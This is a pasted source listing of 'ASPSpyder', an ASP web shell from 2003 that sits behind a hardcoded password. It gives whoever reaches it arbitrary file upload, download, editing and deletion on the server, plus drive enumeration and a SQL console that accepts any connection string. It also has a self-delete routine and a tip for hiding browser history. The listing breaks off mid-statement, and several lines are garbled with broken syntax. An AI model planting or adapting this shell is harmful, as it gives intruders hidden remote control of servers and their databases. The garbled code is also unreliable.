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Oct 22nd, 2017
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text 48.46 KB | None | 0 0
  1. <%
  2. Function BufferContent(data)
  3. Dim strContent(64)
  4. Dim i
  5. ClearString strContent
  6. For i = 1 To LenB(data)
  7. AddString strContent,Chr(AscB(MidB(data,i,1)))
  8. Next
  9. BufferContent = fnReadString(strContent)
  10. End Function
  12. Sub ClearString(part)
  13. Dim index
  14. For index = 0 to 64
  15. part(index)=""
  16. Next
  17. End Sub
  19. Sub AddString(part,newString)
  20. Dim tmp
  21. Dim index
  22. part(0) = part(0) & newString
  23. If Len(part(0)) > 64 Then
  24. index=0
  25. tmp=""
  26. Do
  27. tmp=part(index) & tmp
  28. part(index) = ""
  29. index = index + 1
  30. Loop until part(index) = ""
  31. part(index) = tmp
  32. End If
  33. End Sub
  35. Function fnReadString(part)
  36. Dim tmp
  37. Dim index
  38. tmp = ""
  39. For index = 0 to 64
  40. If part(index) <> "" Then
  41. tmp = part(index) & tmp
  42. End If
  43. Next
  44. FnReadString = tmp
  45. End Function
  48. Class FileUploader
  49. Public Files
  50. Private mcolFormElem
  51. Private Sub Class_Initialize()
  52. Set Files = Server.CreateObject("Scripting.Dictionary")
  53. Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
  54. End Sub
  56. Private Sub Class_Terminate()
  57. If IsObject(Files) Then
  58. Files.RemoveAll()
  59. Set Files = Nothing
  60. End If
  61. If IsObject(mcolFormElem) Then
  62. mcolFormElem.RemoveAll()
  63. Set mcolFormElem = Nothing
  64. End If
  65. End Sub
  67. Public Property Get Form(sIndex)
  68. Form = ""
  69. If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
  70. End Property
  72. Public Default Sub Upload()
  73. Dim biData, sInputName
  74. Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
  75. Dim nPosFile, nPosBound
  76. biData = Request.BinaryRead(Request.TotalBytes)
  77. nPosBegin = 1
  78. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
  79. If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
  80. vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
  81. nDataBoundPos = InstrB(1, biData, vDataBounds)
  82. Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
  83. nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
  84. nPos = InstrB(nPos, biData, CByteString("name="))
  85. nPosBegin = nPos + 6
  86. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
  87. sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  88. nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
  89. nPosBound = InstrB(nPosEnd, biData, vDataBounds)
  90. If nPosFile <> 0 And nPosFile < nPosBound Then
  91. Dim oUploadFile, sFileName
  92. Set oUploadFile = New UploadedFile
  93. nPosBegin = nPosFile + 10
  94. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
  95. sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  96. oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
  97. nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
  98. nPosBegin = nPos + 14
  99. nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
  100. oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  101. nPosBegin = nPosEnd+4
  102. nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
  103. oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
  104. If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
  105. Else
  106. nPos = InstrB(nPos, biData, CByteString(Chr(13)))
  107. nPosBegin = nPos + 4
  108. nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
  109. If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
  110. End If
  111. nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
  112. Loop
  113. End Sub
  115. 'String to byte string conversion
  116. Private Function CByteString(sString)
  117. Dim nIndex
  118. For nIndex = 1 to Len(sString)
  119. CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
  120. Next
  121. End Function
  123. 'Byte string to string conversion
  124. Private Function CWideString(bsString)
  125. Dim nIndex
  126. CWideString =""
  127. For nIndex = 1 to LenB(bsString)
  128. CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
  129. Next
  130. End Function
  131. End Class
  134. Class UploadedFile
  135. Public ContentType
  136. Public FileName
  137. Public FileData
  138. Public Property Get FileSize()
  139. FileSize = LenB(FileData)
  140. End Property
  142. Public Sub SaveToDisk(sPath)
  143. Dim oFS, oFile
  144. Dim nIndex
  145. If sPath = "" Or FileName = "" Then Exit Sub
  146. If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
  147. Set oFS = Server.CreateObject("Scripting.FileSystemObject")
  148. If Not oFS.FolderExists(sPath) Then Exit Sub
  149. Set oFile = oFS.CreateTextFile(sPath & FileName, True)
  150. ' output mechanism modified for buffering
  151. oFile.Write BufferContent(FileData)
  152. oFile.Close
  153. End Sub
  155. Public Sub SaveToDatabase(ByRef oField)
  156. If LenB(FileData) = 0 Then Exit Sub
  157. If IsObject(oField) Then
  158. oField.AppendChunk FileData
  159. End If
  160. End Sub
  161. End Class
  163. ' Create the FileUploader
  164. IF REQUEST.QueryString("upload")="@" THEN
  165. Dim Uploader, File
  166. Set Uploader = New FileUploader
  168. ' This starts the upload process
  169. Uploader.Upload()
  171. %>
  172. <html><title>ASPYDrvsInfo</title>
  173. <style>
  174. <!--
  175. A:link {font-style: text-decoration: none; color: #c8c8c8}
  176. A:visited {font-style: text-decoration: none; color: #777777}
  177. A:active {font-style: text-decoration: none; color: #ff8300}
  178. A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
  179. * {scrollbar-base-color:#777777;
  180. scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
  181. scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
  182. input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
  183. //-->
  184. </style>
  185. <body bgcolor=black text=white>
  186. <BR><BR><BR>
  187. <center><table bgcolor="#505050" cellpadding=4>
  188. <tr><td><Font face=arial size=-1>File upload Information:</font>
  189. </td></tr><tr><td bgcolor=black ><table>
  190. <%
  192. ' Check if any files were uploaded
  193. If Uploader.Files.Count = 0 Then
  194. Response.Write "File(s) not uploaded."
  195. Else
  196. ' Loop through the uploaded files
  197. For Each File In Uploader.Files.Items
  198. File.SaveToDisk Request.QueryString("txtpath")
  199. Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
  200. Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
  201. Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
  202. Next
  203. End If
  204. %>
  205. <TR><TD>&nbsp;</TD></TR></table>
  206. </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
  207. <%
  208. response.End() '---- XXX
  209. END IF
  210. '--------
  212. Response.Buffer = True
  213. password = "fn@l007" ' <---Your password here
  215. If request.querystring("logoff")="@" then
  216. session("shagman")="" ' Logged off
  217. session("dbcon")="" ' Database Connection
  218. session("txtpath")="" ' any pathinfo
  219. end if
  221. If (session("shagman")<>password) and Request.form("code")="" Then
  222. %>
  223. <body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
  224. <table><tr><td>
  225. <FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
  226. <table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
  227. <INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
  228. </td></tr></table>
  229. </td></tr><tr><td align=right>
  230. <font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
  231. </td></tr></table></FORM>
  232. <%If request.querystring("logoff")="@" then%>
  233. <font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
  234. <%end if%>
  235. <center>
  236. <%
  237. Response.END
  238. End If
  239. If Request.form("code") = password or session("shagman") = password Then
  240. session("shagman") = password
  241. Else
  242. Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
  243. Response.END
  244. End If
  246. server.scriptTimeout=180
  247. set fso = Server.CreateObject("Scripting.FileSystemObject")
  248. mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
  249. mapPathLen = len(mapPath)
  251. if session(myScriptName) = "" then
  252. for x = mapPathLen to 0 step -1
  253. myScriptName = mid(mapPath,x)
  254. if instr(1,myScriptName,"\")>0 then
  255. myScriptName = mid(mapPath,x+1)
  256. x=0
  257. session(myScriptName) = myScriptName
  258. end if
  259. next
  260. Else
  261. myScriptName = session(myScriptName)
  262. end if
  265. wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
  266. Target = "D:\hshome\masterhr\\" ' ---Directory to which files will be DUMPED Too and From
  268. if len(Request.querystring("txtpath"))=3 then
  269. pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
  270. else
  271. pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
  272. end if
  274. If Request.Form("txtpath") = "" Then
  275. MyPath = Request.QueryString("txtpath")
  276. Else
  277. MyPath = Request.Form("txtpath")
  278. End If
  280. ' ---Path correction routine
  281. If len(MyPath)=1 then MyPath=MyPath & ":\"
  282. If len(MyPath)=2 then MyPath=MyPath & "\"
  283. If MyPath = "" Then MyPath = wwwRoot
  284. If not fso.FolderExists(MyPath) then
  285. Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
  286. Response.end
  287. end if
  289. set folder = fso.GetFolder(MyPath)
  291. if fso.GetFolder(Target) = false then
  292. Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
  293. else
  294. set fileCopy = fso.GetFolder(Target)
  295. end if
  298. If Not(folder.IsRootFolder) Then
  299. If len(folder.ParentFolder)>3 then
  300. showPath = folder.ParentFolder & "\" &
  301. Else
  302. showPath = folder.ParentFolder &
  303. End If
  304. Else
  305. showPath = left(MyPath,2)
  306. End If
  308. MyPath=showPath
  309. showPath=MyPath & "\"
  310. ' ---Path correction routine-DONE
  312. set drv=fso.GetDrive(left(MyPath,2))
  314. if Request.Form("cmd")="Download" then
  315. if Request.Form("Fname")<>"" then
  316. Response.Buffer = True
  317. Response.Clear
  318. strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
  319. Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
  320. Set Bin = Sys.OpenTextFile( strFileName, 1, False )
  321. Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
  322. Response.ContentType = "application/octet-stream"
  323. While Not Bin.AtEndOfStream
  324. Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
  325. Wend
  326. Bin.Close : Set Bin = Nothing
  327. Set Sys = Nothing
  328. Else
  329. err.number=500
  330. err.description="Nothing selected for download..."
  331. End if
  332. End if
  333. %>
  334. <html>
  335. <style>
  336. <!--
  337. A:link {font-style: text-decoration: none; color: #c8c8c8}
  338. A:visited {font-style: text-decoration: none; color: #777777}
  339. A:active {font-style: text-decoration: none; color: #ff8300}
  340. A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
  341. * {scrollbar-base-color:#777777;
  342. scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
  343. scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
  344. input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
  345. //-->
  346. </style>
  347. <%
  349. if request.QueryString("qa")="@" then
  350. '-------------
  351. sub getTable(mySQL)
  352. if mySQL="" then
  353. exit sub
  354. end if
  355. on error resume next
  356. Response.Buffer = True
  357. Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
  358. myConnectionString=session("dbCon")
  359. Set myDBConnection = Server.CreateObject("ADODB.Connection")
  360. myDBConnection.Open myConnectionString
  361. myFlag = False
  362. myFlag = errChk()
  363. set rs = Server.CreateObject("ADODB.Recordset")
  364. rs.cursorlocation = 3
  365. mySQL, myDBConnection
  366. myFlag = errChk()
  368. if"Asynchronous Rowset Processing") = 16 then
  369. For i = 0 To rs.Fields.Count - 1
  370. myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
  371. Next
  372. myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
  373. rs.MoveFirst
  374. rs.PageSize=mNR
  375. if int(rs.RecordCount/mNR) < mPage then mPage=1
  376. rs.AbsolutePage = mPage
  377. Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
  378. if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
  379. Response.Write "<select name=cmbPageSelect>"
  380. For x = 1 to rs.PageCount
  381. if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
  382. Next
  383. Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
  384. if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
  385. Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
  386. response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
  388. For x = 1 to rs.PageSize
  389. If Not rs.EOF Then
  390. response.Write "<TR>"
  391. For i = 0 to rs.Fields.Count - 1
  392. response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
  393. Next
  394. response.Write "</TR>"
  395. response.Flush()
  396. rs.MoveNext
  397. Else
  398. x=rs.PageSize
  399. End If
  400. Next
  401. response.Write "</Table>"
  402. myFlag = errChk()
  404. else
  405. if not myFlag then
  406. myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
  407. response.Write myTitle
  408. end if
  409. end if
  410. set myDBConnection = nothing
  411. set rs2 = nothing
  412. set rs = nothing
  414. End sub
  416. sub getXML(mySQL)
  417. if mySQL="" then
  418. exit sub
  419. end if
  420. on error resume next
  421. Response.Buffer = True
  422. Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
  423. myConnectionString=session("dbCon")
  424. Set myDBConnection = Server.CreateObject("ADODB.Connection")
  425. myDBConnection.Open myConnectionString
  426. myFlag = False
  427. myFlag = errChk()
  428. set rs = Server.CreateObject("ADODB.Recordset")
  429. rs.cursorlocation = 3
  430. mySQL, myDBConnection
  431. myFlag = errChk()
  432. if"Asynchronous Rowset Processing") = 16 then
  433. Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
  434. Response.Write "<textarea cols=75 name=txtXML rows=15>"
  435. rs.MoveFirst
  436. response.Write vbcrlf & "<?xml version=""1.0"" ?>"
  437. response.Write vbcrlf & "<TableXML>"
  438. Do While Not rs.EOF
  439. response.Write vbcrlf & "<Column>"
  440. For i = 0 to rs.Fields.Count - 1
  441. response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
  442. response.Flush()
  443. Next
  444. response.Write "</Column>"
  445. rs.MoveNext
  446. Loop
  447. response.Write "</TableXML>"
  448. response.Write "</textarea>"
  449. myFlag = errChk()
  451. else
  452. if not myFlag then
  453. myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
  454. response.Write myTitle
  455. end if
  456. end if
  457. End sub
  459. Function errChk()
  460. if err.Number <> 0 and err.Number <> 13 then
  461. dim myText
  462. myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
  463. response.Write myText
  464. err.Number = 0
  465. errChk = True
  466. end if
  467. end Function
  469. Dim myQuery,mPage,mNR
  470. myQuery = request.Form("txtSQL")
  471. if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
  472. if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
  473. mPage=cint(request.Form("mPage"))
  474. if mPage<1 then mPage=1
  475. mNR=cint(request.Form("txtNoRecords"))
  476. if mNR<1 then mNR=30
  477. %>
  478. <html><title>ASPyQAnalyser</title>
  479. <script language="VbScript">
  480. sub cmdSubmit_onclick
  481. if Document.frmSQL.txtSQL.value = "" then
  482. Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
  483. exit sub
  484. end if
  485. Document.frmSQL.Submit
  486. end sub
  487. sub cmdTables_onclick
  488. Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
  489. Document.frmSQL.Submit
  490. end sub
  491. sub cmdColumns_onclick
  492. strTable =InputBox("Return Columns for which Table?","Table Name...")
  493. strTable = Trim(strTable)
  494. if len(strTable) > 0 Then
  495. SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
  496. Document.frmSQL.txtSQL.value = SQL
  497. Document.frmSQL.Submit
  498. End if
  499. end sub
  500. sub cmdClear_onclick
  501. Document.frmSQL.txtSQL.value = ""
  502. end sub
  503. sub cmdBack_onclick
  504. Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
  505. end sub
  506. Sub btnPagePrev_OnClick
  507. Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
  508. Document.frmSQL.Submit
  509. end sub
  510. Sub btnPageNext_OnClick
  511. Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
  512. Document.frmSQL.Submit
  513. end sub
  514. Sub cmbPageSelect_onchange
  515. Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
  516. Document.frmSQL.Submit
  517. End Sub
  518. Sub txtNoRecords_onclick
  519. Document.frmSQL.cmbPageSelect.selectedIndex = 0
  520. Document.frmSQL.mPage.value = 1
  521. End Sub
  522. </script>
  523. <style>
  524. TR {font-family: sans-serif;}
  525. </style>
  526. <body bgcolor=black>
  527. <form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
  528. <table border="0"><tr>
  529. <td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
  530. your connection string here : </font><font color="#CCCCCC">
  531. <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
  532. </font><BR>
  533. <textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
  534. <input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
  535. </td>
  536. <td>XXXXXX</td><td>
  537. <center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
  538. </td></tr></table>
  539. <table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else getTable(myQuery) %></td></tr></table></form>
  540. <HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=-1 color=gray>Cheers to <a href="">hAshish</a> for all the help!</font></p><BR>
  541. </body>
  542. </html>
  543. <%
  544. set myDBConnection = nothing
  545. set rs2 = nothing
  546. set rs = nothing
  547. '-------------
  548. response.End()
  549. end if
  551. %>
  552. <title><%=MyPath%></title>
  553. </head>
  554. <body bgcolor=black text=white topAprgin="0">
  555. <!-- Copyright Vela iNC. Apr2003 [] Coded by ~sir_shagalot -->
  556. <%
  557. Response.Flush
  558. 'Code Optimisation START
  559. select case request.form("cmd")
  560. case ""
  561. If request.form("dirStuff")<>"" then
  562. Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>"
  563. Else
  564. Response.Write "<font face=webdings size=+3 color=#ff8300>&#1570;</font>"
  565. End If
  566. case " Copy "
  567. ' ---Copy From Folder routine Start
  568. If Request.Form("Fname")="" then
  569. Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\???</font><BR>"
  570. err.number=424
  571. Else
  572. Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>"
  573. fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fname"),Target & Request.Form("Fname")
  574. Response.Flush
  575. End If
  576. ' ---Copy From Folder routine Stop
  577. case " Copy "
  578. ' ---Copy Too Folder routine Start
  579. If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "------------------------------" Then
  580. Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>"
  581. Response.Flush
  582. fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath") & "\" & Request.Form("ToCopy")
  583. Else
  584. Response.Write "<font face=arial size=-2 color=#ff8300>Copying: " & Request.Form("txtpath") & "\???</font><BR>"
  585. err.number=424
  586. End If
  587. ' ---Copy Too Folder routine Stop
  588. case "Delete" 'two of this
  589. if request.form("todelete")<>"" then
  590. ' ---File Delete start
  591. If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Servervariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then
  592. Response.Write "<center><font face=arial size=-2 color=#ff8300><BR><BR><HR>SELFDESTRUCT INITIATED...<BR>"
  593. Response.Flush
  594. fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
  595. %>+++DONE+++</font><BR><HR>
  596. <font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
  597. <%Response.End
  598. End If
  599. If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "------------------------------" Then
  600. Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>"
  601. Response.Flush
  602. fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelete")
  603. Else
  604. Response.Write "<font face=arial size=-2 color=#ff8300>Deleting: " & Request.Form("txtpath") & "\???</font><BR>"
  605. err.number=424
  606. End If
  607. ' ---File Delete stop
  608. Else If request.form("dirStuff")<>"" then
  609. Response.Write "<font face=arial size=-2 color=#ff8300>Deleting folder...</font><BR>"
  610. fso.DeleteFolder MyPath & "\" & request.form("DirName")
  611. end if
  612. End If
  614. case "Edit/Create"
  615. %>
  616. <center><BR><table bgcolor="#505050" cellpadding="8"><tr>
  617. <td bgcolor="#000000" valign="bottom">
  618. <Font face=arial SIZE=-2 color=#ff8300>NOTE: The following edit box maynot display special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font>
  619. </td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR>
  620. <%
  621. ' fetch file information
  622. Set f = fso.GetFile(pathname)
  623. %>
  624. file Type: <%=f.Type%><BR>
  625. file Size: <%=FormatNumber(f.size,0)%> bytes<BR>
  626. file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.datecreated,3)%><BR>
  627. last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime(f.datelastmodified,3)%><BR>
  628. last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime(f.datelastaccessed,3)%><BR>
  629. file Attributes: <%=f.attributes%><BR>
  630. <%
  631. Set f = Nothing
  632. response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_NAME") & "?txtpath=" & MyPath & """ METHOD=""POST"">"
  633. 'read the file
  634. Set f = fso.OpenTextFile(pathname)
  635. If NOT f.AtEndOfStream Then fstr = f.readall
  636. f.Close
  637. Set f = Nothing
  638. Set fso = Nothing
  639. response.write "<TABLE><TR><TD>" & VBCRLF
  640. response.write "<FONT TITLE=""Use this text area to view or change the contents of this document. Click [Save As] to store the updated contents to the web server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF
  641. response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Server.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF
  642. response.write "</TD></TR></TABLE>" & VBCRLF
  643. %>
  644. <BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME" VALUE="<%=pathname%>">
  645. <INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file specifed and overwrite it without warning.">
  646. <INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an error while saving, then most likely you do not have write access OR the file attributes are set to readonly !!">
  647. </FORM></td></tr></table><BR>
  648. <%
  649. response.end
  651. case "Create"
  652. Response.Write "<font face=arial size=-2 color=#ff8300>Creating folder...</font><BR>"
  653. fso.CreateFolder MyPath & "\" & request.form("DirName")
  655. case "Save As"
  656. Response.Write "<font face=arial size=-2 color=#ff8300>Saving file...</font><BR>"
  657. Set f = fso.CreateTextFile(Request.Form("pathname"))
  658. f.write Request.Form("FILEDATA")
  659. f.close
  660. end select
  661. 'Code Optimisation STOP
  662. ' ---DRIVES start here
  663. If request.querystring("getDRVs")="@" then
  664. %>
  665. <BR><BR><BR><center><table bgcolor="#505050" cellpadding=4>
  666. <tr><td><Font face=arial size=-1>Available Drive Information:</font>
  667. </td></tr><tr><td bgcolor=black >
  668. <table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName</td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></tr>
  669. <%For Each thingy in fso.Drives%>
  670. <tr><td><tt>
  671. <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thingy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSize)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeName%>
  672. <%Next%>
  673. </td></tr></table>
  674. </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
  675. <%
  676. Response.end
  677. end if
  678. ' ---DRIVES stop here
  679. %>
  680. <HEAD>
  681. <SCRIPT Language="VBScript">
  682. sub getit(thestuff)
  683. if right("<%=showPath%>",1) <> "\" Then
  684. document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff
  685. Else
  686. document.myform.txtpath.value = "<%=showPath%>" & thestuff
  687. End If
  688. document.myform.submit()
  689. End sub
  690. </SCRIPT>
  691. </HEAD>
  692. <%
  693. '---Report errors
  694. select case err.number
  695. case "0"
  696. response.write "<font face=webdings color=#55ff55>i</font> <font face=arial size=-2>Successfull..</font>"
  698. case "58"
  699. response.write "<font face=arial size=-1 color=red>Folder already exists OR no folder name specified...</font>"
  701. case "70"
  702. response.write "<font face=arial size=-1 color=red>Permission Denied, folder/file is readonly or contains such files...</font>"
  704. case "76"
  705. response.write "<font face=arial size=-1 color=red>Path not found...</font>"
  707. case "424"
